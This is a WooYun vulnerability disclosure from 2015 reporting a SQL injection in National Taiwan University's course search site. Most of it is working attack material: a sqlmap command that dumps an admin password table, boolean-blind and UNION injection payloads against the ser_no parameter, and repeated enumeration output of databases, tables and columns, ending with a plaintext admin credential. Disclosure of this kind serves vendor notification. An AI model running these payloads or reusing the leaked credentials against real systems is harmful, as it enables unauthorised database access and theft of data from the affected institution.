当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154228

漏洞标题:臺大課程網某處存在SQL植入漏洞(27萬課程信息泄露+acadmin明文密碼泄露)(臺灣地區)

相关厂商:國立臺灣大學

漏洞作者: 路人甲

提交时间:2015-11-20 18:35

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-20: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

臺大課程網某處存在SQL植入漏洞---27萬課程信息泄露+acadmin明文密碼泄露

详细说明:

地址:http://**.**.**.**/nol/coursesearch/print_table.php?course_id=104%2014800&class=&dpt_code=0000&ser_no=10105&semester=97-2

python sqlmap.py -u "http://**.**.**.**/nol/coursesearch/print_table.php?course_id=104%2014800&class=&dpt_code=0000&ser_no=10105&semester=97-2" -p ser_no --technique=BU --random-agent --batch -D public -T admin_password -C account,password --dump


Database: public
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| aca_course | 274528 |


Database: public
Table: aca_course
[44 columns]
+---------------+---------+
| Column | Type |
+---------------+---------+
| year | varchar |
| chgitem | varchar |
| class_no | varchar |
| co_chg | varchar |
| co_gmark | varchar |
| co_rep | varchar |
| co_select | varchar |
| co_tp | varchar |
| cou_teacno | varchar |
| course_no | varchar |
| credit | varchar |
| crs_cname | varchar |
| crs_ename | varchar |
| day1 | varchar |
| day2 | varchar |
| day3 | varchar |
| day4 | varchar |
| day5 | varchar |
| day6 | varchar |
| day7 | varchar |
| dpt_abbr | varchar |
| dpt_code | bpchar |
| engmark | bpchar |
| eno | float8 |
| forh | varchar |
| limited | varchar |
| mark | varchar |
| place | varchar |
| place_2 | varchar |
| place_3 | varchar |
| place_4 | varchar |
| place_5 | varchar |
| place_6 | varchar |
| pre_course | bpchar |
| sel_code | varchar |
| semester | varchar |
| ser_no | varchar |
| sno | float8 |
| tea_code | varchar |
| teacher_cname | varchar |
| teacher_ename | varchar |
| tno | float8 |
| week | varchar |
| year_code | varchar |
+---------------+---------+


Database: public
Table: admin_password
[3 entries]
+---------+------------+
| account | password |
+---------+------------+
| 1 | 2 |
| 2 | 1 |
| acadmin | acadmin123 |
+---------+------------+

漏洞证明:

---
Parameter: ser_no (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: course_id=104 14800&class=&dpt_code=0000&ser_no=10105' AND 8244=8244 AND 'rMil'='rMil&semester=97-2
Type: UNION query
Title: Generic UNION query (NULL) - 46 columns
Payload: course_id=104 14800&class=&dpt_code=0000&ser_no=-7548' UNION ALL SELECT 'qxzzq'||'HxXjWdBxPJejOJUThPKDuDfpOgdqrpDnliAuofXh'||'qvpvq',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&semester=97-2
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: PostgreSQL
current user: 'curri'
current user is DBA: False
database management system users [2]:
[*] curri
[*] postgres
Database: public
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| aca_course | 274528 |
| ifcrftr | 86190 |
| english | 12168 |
| ifcrfte | 5972 |
| tea_emp | 5654 |
| cou3 | 4889 |
| counter | 2138 |
| cou2 | 1812 |
| ifcrfcr | 852 |
| ifcrfyl | 750 |
| com | 670 |
| cougrp | 612 |
| coudept | 348 |
| dep_unit | 314 |
| inengtech | 304 |
| commopt | 172 |
| asforcou | 69 |
| ifcrfsl | 58 |
| ifcrfyln | 31 |
| sys_config | 9 |
| bulletin | 6 |
| admin_password | 3 |
| user_session | 1 |
+-------------------------+---------+
Database: information_schema
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| sql_features | 439 |
| sql_sizing | 23 |
| sql_implementation_info | 12 |
| sql_packages | 10 |
| sql_languages | 2 |
+-------------------------+---------+
Database: pg_catalog
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| pg_depend | 4253 |
| pg_attribute | 2742 |
| pg_proc | 1859 |
| pg_description | 1677 |
| pg_operator | 643 |
| pg_class | 345 |
| pg_amop | 338 |
| pg_type | 329 |
| pg_cast | 256 |
| pg_index | 130 |
| pg_conversion | 116 |
| pg_amproc | 109 |
| pg_aggregate | 75 |
| pg_opclass | 73 |
| pg_rewrite | 66 |
| pg_attrdef | 14 |
| pg_constraint | 9 |
| pg_pltemplate | 6 |
| pg_namespace | 5 |
| pg_am | 4 |
| pg_database | 4 |
| pg_language | 4 |
| pg_trigger | 3 |
| pg_tablespace | 2 |
| pg_shdepend | 1 |
+-------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: pg_catalog
Table: pg_authid
[1 column]
+-------------+------+
| Column | Type |
+-------------+------+
| rolpassword | text |
+-------------+------+
Database: pg_catalog
Table: pg_shadow
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| passwd | text |
+--------+------+
Database: pg_catalog
Table: pg_user
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| passwd | text |
+--------+------+
Database: pg_catalog
Table: pg_roles
[1 column]
+-------------+------+
| Column | Type |
+-------------+------+
| rolpassword | text |
+-------------+------+
Database: public
Table: guest_info
[1 column]
+----------+---------+
| Column | Type |
+----------+---------+
| password | varchar |
+----------+---------+
Database: public
Table: theguest
[1 column]
+----------+---------+
| Column | Type |
+----------+---------+
| password | varchar |
+----------+---------+
Database: public
Table: admin_password
[1 column]
+----------+---------+
| Column | Type |
+----------+---------+
| password | varchar |
+----------+---------+
Database: public
Table: admin_password_index
[1 column]
+----------+---------+
| Column | Type |
+----------+---------+
| password | varchar |
+----------+---------+
Database: public
Table: admin_password_pri
[1 column]
+----------+---------+
| Column | Type |
+----------+---------+
| password | varchar |
+----------+---------+
Database: pg_catalog
Table: pg_user
[2 entries]
+----------+
| passwd |
+----------+
| ******** |
| ******** |
+----------+
Database: pg_catalog
Table: pg_roles
[2 entries]
+-------------+
| rolpassword |
+-------------+
| ******** |
| ******** |
+-------------+
Database: public
Table: admin_password
[3 entries]
+------------+
| password |
+------------+
| 1 |
| 2 |
| acadmin123 |
+------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ser_no (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: course_id=104 14800&class=&dpt_code=0000&ser_no=10105' AND 8244=8244 AND 'rMil'='rMil&semester=97-2
Type: UNION query
Title: Generic UNION query (NULL) - 46 columns
Payload: course_id=104 14800&class=&dpt_code=0000&ser_no=-7548' UNION ALL SELECT 'qxzzq'||'HxXjWdBxPJejOJUThPKDuDfpOgdqrpDnliAuofXh'||'qvpvq',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&semester=97-2
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: PostgreSQL
available databases [3]:
[*] information_schema
[*] pg_catalog
[*] public
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ser_no (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: course_id=104 14800&class=&dpt_code=0000&ser_no=10105' AND 8244=8244 AND 'rMil'='rMil&semester=97-2
Type: UNION query
Title: Generic UNION query (NULL) - 46 columns
Payload: course_id=104 14800&class=&dpt_code=0000&ser_no=-7548' UNION ALL SELECT 'qxzzq'||'HxXjWdBxPJejOJUThPKDuDfpOgdqrpDnliAuofXh'||'qvpvq',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&semester=97-2
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: PostgreSQL
Database: public
Table: aca_course
[44 columns]
+---------------+---------+
| Column | Type |
+---------------+---------+
| year | varchar |
| chgitem | varchar |
| class_no | varchar |
| co_chg | varchar |
| co_gmark | varchar |
| co_rep | varchar |
| co_select | varchar |
| co_tp | varchar |
| cou_teacno | varchar |
| course_no | varchar |
| credit | varchar |
| crs_cname | varchar |
| crs_ename | varchar |
| day1 | varchar |
| day2 | varchar |
| day3 | varchar |
| day4 | varchar |
| day5 | varchar |
| day6 | varchar |
| day7 | varchar |
| dpt_abbr | varchar |
| dpt_code | bpchar |
| engmark | bpchar |
| eno | float8 |
| forh | varchar |
| limited | varchar |
| mark | varchar |
| place | varchar |
| place_2 | varchar |
| place_3 | varchar |
| place_4 | varchar |
| place_5 | varchar |
| place_6 | varchar |
| pre_course | bpchar |
| sel_code | varchar |
| semester | varchar |
| ser_no | varchar |
| sno | float8 |
| tea_code | varchar |
| teacher_cname | varchar |
| teacher_ename | varchar |
| tno | float8 |
| week | varchar |
| year_code | varchar |
+---------------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ser_no (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: course_id=104 14800&class=&dpt_code=0000&ser_no=10105' AND 8244=8244 AND 'rMil'='rMil&semester=97-2
Type: UNION query
Title: Generic UNION query (NULL) - 46 columns
Payload: course_id=104 14800&class=&dpt_code=0000&ser_no=-7548' UNION ALL SELECT 'qxzzq'||'HxXjWdBxPJejOJUThPKDuDfpOgdqrpDnliAuofXh'||'qvpvq',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&semester=97-2
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: PostgreSQL
Database: public
Table: admin_password
[2 columns]
+----------+---------+
| Column | Type |
+----------+---------+
| account | varchar |
| password | varchar |
+----------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ser_no (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: course_id=104 14800&class=&dpt_code=0000&ser_no=10105' AND 8244=8244 AND 'rMil'='rMil&semester=97-2
Type: UNION query
Title: Generic UNION query (NULL) - 46 columns
Payload: course_id=104 14800&class=&dpt_code=0000&ser_no=-7548' UNION ALL SELECT 'qxzzq'||'HxXjWdBxPJejOJUThPKDuDfpOgdqrpDnliAuofXh'||'qvpvq',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&semester=97-2
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: PostgreSQL
Database: public
Table: admin_password
[3 entries]
+---------+------------+
| account | password |
+---------+------------+
| 1 | 2 |
| 2 | 1 |
| acadmin | acadmin123 |
+---------+------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-11-24 08:13

厂商回复:

感謝通報

最新状态:

暂无


漏洞评价:

评价